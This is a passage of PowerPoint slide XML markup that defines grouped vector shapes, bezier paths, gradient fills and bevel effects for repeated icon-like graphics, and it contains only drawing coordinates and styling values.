                  <a:gd name="connsiteY0" fmla="*/ 33372 h 33372"/>
                  <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 33372"/>
                  <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                  <a:gd name="connsiteY2" fmla="*/ 33372 h 33372"/>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                  <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                  <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                  <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                  <a:gd name="connsiteY2" fmla="*/ 24102 h 24102"/>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 824799"/>
                  <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                  <a:gd name="connsiteX1" fmla="*/ 404308 w 824799"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                  <a:gd name="connsiteX2" fmla="*/ 824799 w 824799"/>
                  <a:gd name="connsiteY2" fmla="*/ 24102 h 24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4799" h="24102">
                    <a:moveTo>
                      <a:pt x="0" y="24102"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="140163" y="7416"/>
                      <a:pt x="266842" y="0"/>
                      <a:pt x="404308" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="541774" y="0"/>
                      <a:pt x="824799" y="24102"/>
                      <a:pt x="824799" y="241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6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3194770" y="3941265"/>
                <a:ext cx="340880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50500">
                    <a:srgbClr val="FFFFFF">
                      <a:alpha val="19000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="42000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="27000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="59000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="23000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100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>
                <a:off x="3235719" y="4159332"/>
                <a:ext cx="258982" cy="601579"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 29055"/>
                </a:avLst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76200" contourW="38100">
                <a:bevelT w="139700" h="139700" prst="divot"/>
                <a:extrusionClr>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff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>
                <a:off x="3256981" y="4215675"/>
                <a:ext cx="216458" cy="260072"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 26999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bevelT w="50800" h="139700" prst="divot"/>
                <a:extrusionClr>
                  <a:schemeClr val="bg1">
                    <a:lumMod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5" name="Picture 18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6051" y="1468555"/>
                <a:ext cx="2198318" cy="227805"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="305" name="Group 304"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7843461" y="2126554"/>
            <a:ext cx="802905" cy="1212389"/>
            <a:chOff x="5488955" y="3058000"/>
            <a:chExt cx="802905" cy="1212389"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="307" name="Rectangle 306"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5488955" y="3058000"/>
              <a:ext cx="802905" cy="121238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5581162" y="3075558"/>
              <a:ext cx="666021" cy="1115443"/>
              <a:chOff x="2266051" y="1450709"/>
              <a:chExt cx="2198318" cy="3681709"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="309" name="Rectangle 308"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2266051" y="1468556"/>
                <a:ext cx="2198318" cy="36638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Trapezoid 309"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="10800000">
                <a:off x="2582053" y="1450709"/>
                <a:ext cx="1566316" cy="1686284"/>
              </a:xfrm>
              <a:prstGeom prst="trapezoid">
                <a:avLst>
                  <a:gd name="adj" fmla="val 23881"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="59000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="74000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="41000">
                    <a:srgbClr val="FFFFFF">
                      <a:alpha val="74000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="39000">
                    <a:srgbClr val="FFFFFF">
                      <a:alpha val="67000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="61000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="67000"/>
                    </a:schemeClr>
                  </a:gs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92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Delay 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="2731399" y="3125209"/>
                <a:ext cx="1267622" cy="825036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7622" h="825036">
                    <a:moveTo>
                      <a:pt x="72605" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="496576" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="730729" y="0"/>
                      <a:pt x="1267622" y="184691"/>
                      <a:pt x="1267622" y="412518"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1267622" y="640345"/>
                      <a:pt x="730729" y="825036"/>
                      <a:pt x="496576" y="825036"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="72605" y="825035"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="-20837" y="550023"/>
                      <a:pt x="-27511" y="248315"/>
                      <a:pt x="7260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2671935" y="1503488"/>
                <a:ext cx="1386550" cy="150659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Delay 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="2735708" y="3307844"/>
                <a:ext cx="1259004" cy="451151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  <a:gd name="connsiteX0" fmla="*/ 95168 w 1290185"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX1" fmla="*/ 519139 w 1290185"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX2" fmla="*/ 1290185 w 1290185"/>
                  <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                  <a:gd name="connsiteX3" fmla="*/ 519139 w 1290185"/>
                  <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                  <a:gd name="connsiteX4" fmla="*/ 55122 w 1290185"/>
                  <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                  <a:gd name="connsiteX5" fmla="*/ 95168 w 1290185"/>
                  <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX0" fmla="*/ 72607 w 1307667"/>
                  <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                  <a:gd name="connsiteX1" fmla="*/ 536621 w 1307667"/>
                  <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                  <a:gd name="connsiteX2" fmla="*/ 1307667 w 1307667"/>
                  <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                  <a:gd name="connsiteX3" fmla="*/ 536621 w 1307667"/>
                  <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                  <a:gd name="connsiteX4" fmla="*/ 72604 w 1307667"/>
                  <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                  <a:gd name="connsiteX5" fmla="*/ 72607 w 1307667"/>
                  <a:gd name="connsiteY5" fmla="*/ 1 h 825038"/>
                  <a:gd name="connsiteX0" fmla="*/ 58234 w 1293294"/>
                  <a:gd name="connsiteY0" fmla="*/ -1 h 825036"/>
                  <a:gd name="connsiteX1" fmla="*/ 522248 w 1293294"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX2" fmla="*/ 1293294 w 1293294"/>
                  <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                  <a:gd name="connsiteX3" fmla="*/ 522248 w 1293294"/>
                  <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                  <a:gd name="connsiteX4" fmla="*/ 58231 w 1293294"/>
                  <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                  <a:gd name="connsiteX5" fmla="*/ 58234 w 1293294"/>
                  <a:gd name="connsiteY5" fmla="*/ -1 h 825036"/>
                  <a:gd name="connsiteX0" fmla="*/ 42588 w 1277648"/>
                  <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                  <a:gd name="connsiteX1" fmla="*/ 506602 w 1277648"/>
                  <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                  <a:gd name="connsiteX2" fmla="*/ 1277648 w 1277648"/>
                  <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                  <a:gd name="connsiteX3" fmla="*/ 506602 w 1277648"/>
                  <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                  <a:gd name="connsiteX4" fmla="*/ 42585 w 1277648"/>
                  <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                  <a:gd name="connsiteX5" fmla="*/ 42588 w 1277648"/>
                  <a:gd name="connsiteY5" fmla="*/ 1 h 82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48" h="825038">
                    <a:moveTo>
                      <a:pt x="42588" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="506602" y="2"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="740755" y="2"/>
                      <a:pt x="1277648" y="184693"/>
                      <a:pt x="1277648" y="412520"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1277648" y="640347"/>
                      <a:pt x="740755" y="825038"/>
                      <a:pt x="506602" y="825038"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="42585" y="825036"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="-10810" y="550025"/>
                      <a:pt x="-17482" y="248315"/>
                      <a:pt x="42588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bg1">
                      <a:alpha val="51000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="59000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="32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6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3124930" y="3941265"/>
                <a:ext cx="480561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Stored Data 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="3284980" y="2889707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pattFill prst="nar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Stored Data 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="3284980" y="2889706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gradFill>
                <a:gsLst>
                  <a:gs pos="94000">
                    <a:srgbClr val="1D1D1D">
                      <a:alpha val="16000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="5000">
                    <a:srgbClr val="131313">
                      <a:alpha val="60000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="0">
                    <a:schemeClr val="tx1"/>
                  </a:gs>
                  <a:gs pos="50500">
                    <a:srgbClr val="262626"/>
                  </a:gs>
                  <a:gs pos="42000">
                    <a:schemeClr val="tx1">
                      <a:lumMod val="85000"/>
                      <a:lumOff val="15000"/>
                      <a:alpha val="93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316"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2960628" y="3197416"/>
                <a:ext cx="809164" cy="33019"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                  <a:gd name="connsiteY0" fmla="*/ 33372 h 33372"/>
                  <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 33372"/>
                  <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                  <a:gd name="connsiteY2" fmla="*/ 33372 h 33372"/>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                  <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                  <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                  <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                  <a:gd name="connsiteY2" fmla="*/ 24102 h 24102"/>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 824799"/>
                  <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                  <a:gd name="connsiteX1" fmla="*/ 404308 w 824799"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                  <a:gd name="connsiteX2" fmla="*/ 824799 w 824799"/>
                  <a:gd name="connsiteY2" fmla="*/ 24102 h 24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4799" h="24102">
                    <a:moveTo>
                      <a:pt x="0" y="24102"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="140163" y="7416"/>
                      <a:pt x="266842" y="0"/>
                      <a:pt x="404308" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="541774" y="0"/>
                      <a:pt x="824799" y="24102"/>
                      <a:pt x="824799" y="241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Rectangle 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3194770" y="3941265"/>
                <a:ext cx="340880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50500">
                    <a:srgbClr val="FFFFFF">
                      <a:alpha val="19000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="42000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="27000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="59000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="23000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100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Rounded Rectangle 318"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3235719" y="4159332"/>
                <a:ext cx="258982" cy="601579"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 29055"/>
                </a:avLst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76200" contourW="38100">
                <a:bevelT w="139700" h="139700" prst="divot"/>
                <a:extrusionClr>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff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Rounded Rectangle 319"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3256981" y="4215675"/>
                <a:ext cx="216458" cy="260072"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 26999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bevelT w="50800" h="139700" prst="divot"/>
                <a:extrusionClr>
                  <a:schemeClr val="bg1">
                    <a:lumMod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1" name="Picture 3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6051" y="1468555"/>
                <a:ext cx="2198318" cy="227805"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="323" name="Group 322"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6265639" y="3041428"/>
            <a:ext cx="802905" cy="1197792"/>
            <a:chOff x="5488955" y="3028807"/>
            <a:chExt cx="802905" cy="1197792"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="325" name="Rectangle 324"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5488955" y="3028807"/>
              <a:ext cx="802905" cy="119779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6" name="Group 325"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5581162" y="3075558"/>
              <a:ext cx="666021" cy="1115443"/>
              <a:chOff x="2266051" y="1450709"/>
              <a:chExt cx="2198318" cy="3681709"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="327" name="Rectangle 326"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2266051" y="1468556"/>
                <a:ext cx="2198318" cy="366386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Trapezoid 327"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="10800000">
                <a:off x="2582053" y="1450709"/>
                <a:ext cx="1566316" cy="1686284"/>
              </a:xfrm>
              <a:prstGeom prst="trapezoid">
                <a:avLst>
                  <a:gd name="adj" fmla="val 23881"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="59000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="74000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="41000">
                    <a:srgbClr val="FFFFFF">
                      <a:alpha val="74000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="39000">
                    <a:srgbClr val="FFFFFF">
                      <a:alpha val="67000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="61000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="67000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="0">
                    <a:schemeClr val="bg1">
                      <a:alpha val="0"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="92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softEdge rad="139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Delay 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="2731399" y="3125209"/>
                <a:ext cx="1267622" cy="825036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7622" h="825036">
                    <a:moveTo>
                      <a:pt x="72605" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="496576" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="730729" y="0"/>
                      <a:pt x="1267622" y="184691"/>
                      <a:pt x="1267622" y="412518"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1267622" y="640345"/>
                      <a:pt x="730729" y="825036"/>
                      <a:pt x="496576" y="825036"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="72605" y="825035"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="-20837" y="550023"/>
                      <a:pt x="-27511" y="248315"/>
                      <a:pt x="7260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tx1">
                      <a:lumMod val="85000"/>
                      <a:lumOff val="15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5400000" scaled="0"/>
                <a:tileRect/>
              </a:gra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2671935" y="1503488"/>
                <a:ext cx="1386550" cy="1506594"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="tx1">
                      <a:alpha val="0"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="tx1">
                      <a:alpha val="74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Delay 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="2735708" y="3307844"/>
                <a:ext cx="1259004" cy="451151"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 847941"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 825035"/>
                  <a:gd name="connsiteX1" fmla="*/ 423971 w 847941"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 825035"/>
                  <a:gd name="connsiteX2" fmla="*/ 847942 w 847941"/>
                  <a:gd name="connsiteY2" fmla="*/ 412518 h 825035"/>
                  <a:gd name="connsiteX3" fmla="*/ 423971 w 847941"/>
                  <a:gd name="connsiteY3" fmla="*/ 825036 h 825035"/>
                  <a:gd name="connsiteX4" fmla="*/ 0 w 847941"/>
                  <a:gd name="connsiteY4" fmla="*/ 825035 h 825035"/>
                  <a:gd name="connsiteX5" fmla="*/ 0 w 847941"/>
                  <a:gd name="connsiteY5" fmla="*/ 0 h 825035"/>
                  <a:gd name="connsiteX0" fmla="*/ 44496 w 892438"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX1" fmla="*/ 468467 w 892438"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX2" fmla="*/ 892438 w 892438"/>
                  <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                  <a:gd name="connsiteX3" fmla="*/ 468467 w 892438"/>
                  <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                  <a:gd name="connsiteX4" fmla="*/ 44496 w 892438"/>
                  <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                  <a:gd name="connsiteX5" fmla="*/ 44496 w 892438"/>
                  <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX0" fmla="*/ 72605 w 920547"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX1" fmla="*/ 496576 w 920547"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX2" fmla="*/ 920547 w 920547"/>
                  <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                  <a:gd name="connsiteX3" fmla="*/ 496576 w 920547"/>
                  <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                  <a:gd name="connsiteX4" fmla="*/ 72605 w 920547"/>
                  <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                  <a:gd name="connsiteX5" fmla="*/ 72605 w 920547"/>
                  <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX0" fmla="*/ 72605 w 1267622"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX1" fmla="*/ 496576 w 1267622"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX2" fmla="*/ 1267622 w 1267622"/>
                  <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                  <a:gd name="connsiteX3" fmla="*/ 496576 w 1267622"/>
                  <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                  <a:gd name="connsiteX4" fmla="*/ 72605 w 1267622"/>
                  <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                  <a:gd name="connsiteX5" fmla="*/ 72605 w 1267622"/>
                  <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX0" fmla="*/ 95168 w 1290185"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX1" fmla="*/ 519139 w 1290185"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX2" fmla="*/ 1290185 w 1290185"/>
                  <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                  <a:gd name="connsiteX3" fmla="*/ 519139 w 1290185"/>
                  <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                  <a:gd name="connsiteX4" fmla="*/ 55122 w 1290185"/>
                  <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                  <a:gd name="connsiteX5" fmla="*/ 95168 w 1290185"/>
                  <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX0" fmla="*/ 72607 w 1307667"/>
                  <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                  <a:gd name="connsiteX1" fmla="*/ 536621 w 1307667"/>
                  <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                  <a:gd name="connsiteX2" fmla="*/ 1307667 w 1307667"/>
                  <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                  <a:gd name="connsiteX3" fmla="*/ 536621 w 1307667"/>
                  <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                  <a:gd name="connsiteX4" fmla="*/ 72604 w 1307667"/>
                  <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                  <a:gd name="connsiteX5" fmla="*/ 72607 w 1307667"/>
                  <a:gd name="connsiteY5" fmla="*/ 1 h 825038"/>
                  <a:gd name="connsiteX0" fmla="*/ 58234 w 1293294"/>
                  <a:gd name="connsiteY0" fmla="*/ -1 h 825036"/>
                  <a:gd name="connsiteX1" fmla="*/ 522248 w 1293294"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX2" fmla="*/ 1293294 w 1293294"/>
                  <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                  <a:gd name="connsiteX3" fmla="*/ 522248 w 1293294"/>
                  <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                  <a:gd name="connsiteX4" fmla="*/ 58231 w 1293294"/>
                  <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                  <a:gd name="connsiteX5" fmla="*/ 58234 w 1293294"/>
                  <a:gd name="connsiteY5" fmla="*/ -1 h 825036"/>
                  <a:gd name="connsiteX0" fmla="*/ 42588 w 1277648"/>
                  <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                  <a:gd name="connsiteX1" fmla="*/ 506602 w 1277648"/>
                  <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                  <a:gd name="connsiteX2" fmla="*/ 1277648 w 1277648"/>
                  <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                  <a:gd name="connsiteX3" fmla="*/ 506602 w 1277648"/>
                  <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                  <a:gd name="connsiteX4" fmla="*/ 42585 w 1277648"/>
                  <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                  <a:gd name="connsiteX5" fmla="*/ 42588 w 1277648"/>
                  <a:gd name="connsiteY5" fmla="*/ 1 h 825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77648" h="825038">
                    <a:moveTo>
                      <a:pt x="42588" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="506602" y="2"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="740755" y="2"/>
                      <a:pt x="1277648" y="184693"/>
                      <a:pt x="1277648" y="412520"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1277648" y="640347"/>
                      <a:pt x="740755" y="825038"/>
                      <a:pt x="506602" y="825038"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="42585" y="825036"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="-10810" y="550025"/>
                      <a:pt x="-17482" y="248315"/>
                      <a:pt x="42588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42000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="51000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="59000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="32000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="tx1"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1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Rectangle 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3124930" y="3941265"/>
                <a:ext cx="480561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glow rad="50800">
                  <a:schemeClr val="bg1">
                    <a:alpha val="2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Stored Data 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="3284980" y="2889707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pattFill prst="narVert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Stored Data 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="3284980" y="2889706"/>
                <a:ext cx="160460" cy="825038"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 1667 w 10000"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                  <a:gd name="connsiteX1" fmla="*/ 10000 w 10000"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                  <a:gd name="connsiteX2" fmla="*/ 8333 w 10000"/>
                  <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                  <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
                  <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                  <a:gd name="connsiteX4" fmla="*/ 1667 w 10000"/>
                  <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                  <a:gd name="connsiteX5" fmla="*/ 0 w 10000"/>
                  <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
